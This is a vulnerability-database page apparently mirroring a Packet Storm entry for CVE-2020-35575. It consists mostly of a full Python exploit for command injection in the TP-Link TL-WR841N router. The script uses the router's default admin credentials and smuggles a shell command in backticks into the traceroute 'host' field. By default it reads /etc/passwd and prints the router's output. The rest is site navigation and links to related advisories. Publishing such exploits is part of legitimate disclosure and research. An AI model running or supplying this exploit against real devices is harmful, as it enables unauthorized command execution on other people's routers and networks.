Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormKoh You LiangPACKETSTORM:163274
HistoryJun 24, 2021 - 12:00 a.m.

TP-Link TL-WR841N Command Injection

2021-06-2400:00:00
Koh You Liang
packetstormsecurity.com
675
tp-link tl-wr841n
command injection
cve-2020-35575
exploit
windows 10
request
router
firmware
vulnerable
traceroute
response
successful

EPSS

0.195

Percentile

96.3%

JSON
`# Exploit Title: TP-Link TL-WR841N - Command Injection  
# Date: 2020-12-13  
# Exploit Author: Koh You Liang  
# Vendor Homepage: https://www.tp-link.com/  
# Software Link: https://static.tp-link.com/TL-WR841N(JP)_V13_161028.zip  
# Version: TL-WR841N 0.9.1 4.0  
# Tested on: Windows 10  
# CVE : CVE-2020-35575  
  
import requests  
import sys  
import time  
  
try:  
_ = sys.argv[2]  
payload = ' '.join(sys.argv[1:])  
except IndexError:  
try:  
payload = sys.argv[1]  
except IndexError:  
print("[*] Command not specified, using the default `cat etc/passwd=`")  
payload = 'cat etc/passwd'  
  
# Default credentials is admin:admin - replace with your own  
cookies = {  
'Authorization': 'Basic YWRtaW46YWRtaW4='  
}  
  
headers = {  
'Host': '192.168.0.1',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko=/20100101 Firefox/84.0',  
'Accept': '*/*',  
'Accept-Language': 'en-US,en;q=0.5',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'text/plain',  
'Content-Length': '197',  
'Origin': 'http://192.168.0.1',  
'Connection': 'close',  
'Referer': 'http://192.168.0.1/mainFrame.htm',  
}  
  
data1 = \  
'''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\r\nmaxHopCount=20\r\ntimeout=50\r\nnumberOfTries=1\r\nhost="`{}`"\r\ndataBlockSize=64\r\nX_TP_ConnName=ewan_ipoe_d\r\ndiagnosticsState=Requested\r\nX_TP_HopSeq=0\r\n'''.format(payload)  
response1 = requests.post('http://192.168.0.1/cgi?2', headers=headers, cookies=cookies, data=data1, verify=False)  
print('[+] Sending payload...')  
  
try:  
response1.text.splitlines()[0]  
except IndexError:  
sys.exit('[-] Cannot get response. Please check your cookie.')  
if response1.text.splitlines()[0] != '[error]0':  
sys.exit('[*] Router/Firmware is not vulnerable.')  
  
data2 = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n'  
response2 = requests.post('http://192.168.0.1/cgi?7', headers=headers, cookies=cookies, data=data2, verify=False)  
print('[+] Receiving response from router...')  
time.sleep(0.8) # Buffer time for traceroute to succeed  
  
data3 = '''[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\ndiagnosticsState\r\nX_TP_HopSeq\r\nX_TP_Result\r\n'''  
response3 = requests.post('http://192.168.0.1/cgi?1', headers=headers, cookies=cookies, data=data3, verify=False)  
  
if '=:' in response3.text.splitlines()[3]:  
print('[-] Command not supported.')  
else:  
print('[+] Exploit successful!')  
for line_number, line in enumerate(response3.text.splitlines()):  
try:  
if line_number == 3:  
print(line[12:])  
if line_number > 3 and line != '[error]0':  
print(line)  
if 'not known' in line:  
break  
except IndexError:  
break  
  
`

Related

cve 1
cvelist 1
prion 1
checkpoint_advisories 1
zdt 1
nvd 1
cve
cve
CVE-2020-35575
2020-12-26 02:15:12
cvelist
cvelist
CVE-2020-35575
2020-12-26 02:02:45
prion
prion
Cross site scripting
2020-12-26 02:15:00
checkpoint_advisories
checkpoint_advisories
TP-Link Multiple Products Remote Code Execution (CVE-2020-35575)
2021-09-29 00:00:00
zdt
zdt
TP-Link TL-WR841N - Command Injection Exploit
2021-06-25 00:00:00
nvd
nvd
CVE-2020-35575
2020-12-26 02:15:12

EPSS

0.195

Percentile

96.3%

JSON
Related for PACKETSTORM:163274
cve1cvelist1prion1checkpoint_advisories1zdt1nvd1